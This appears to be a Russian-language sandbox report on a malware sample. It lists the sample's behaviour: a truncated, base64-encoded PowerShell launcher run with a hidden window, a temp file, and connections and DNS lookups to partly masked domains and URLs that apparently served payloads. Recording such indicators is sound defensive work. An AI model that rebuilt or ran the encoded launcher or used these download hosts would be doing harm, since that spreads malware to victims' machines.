Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHQAeQBlAGEAegA5AD0AJwBZAHgAZQBwAGUAZQBwACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBDAFUAcgBJAHQAYABZAGAAUABSAG8AdABvAGMAYABvAGwAIgAgAD0AIAAnAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1568
- %TEMP%\1377956.cvr
- 'sl#######vice-24-7-actief.nl':80
- 'sl#######vice-24-7-actief.nl':443
- 'zu##.net':443
- 'yo#####puterneeds.net':80
- 'yo#####puterneeds.net':443
- 'la###smith.com':80
- http://sl#######vice-24-7-actief.nl/crjns/LODRmgim/
- http://yo#####puterneeds.net/wp-admin/JXjqdXqT/
- http://la###smith.com/old-files/djrowrumw34o8s80545998/
- 'sl#######vice-24-7-actief.nl':443
- 'zu##.net':443
- 'yo#####puterneeds.net':443
- DNS ASK sl#######vice-24-7-actief.nl
- DNS ASK zu##.net
- DNS ASK yo#####puterneeds.net
- DNS ASK la###c.com.br
- DNS ASK la###smith.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHQAeQBlAGEAegA5AD0AJwBZAHgAZQBwAGUAZQBwACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBDAFUAcgBJAHQAYABZAGAAUABSAG8AdABvAGMAYABvAGwAIgAgAD0AIAAnAH...' (со скрытым окном)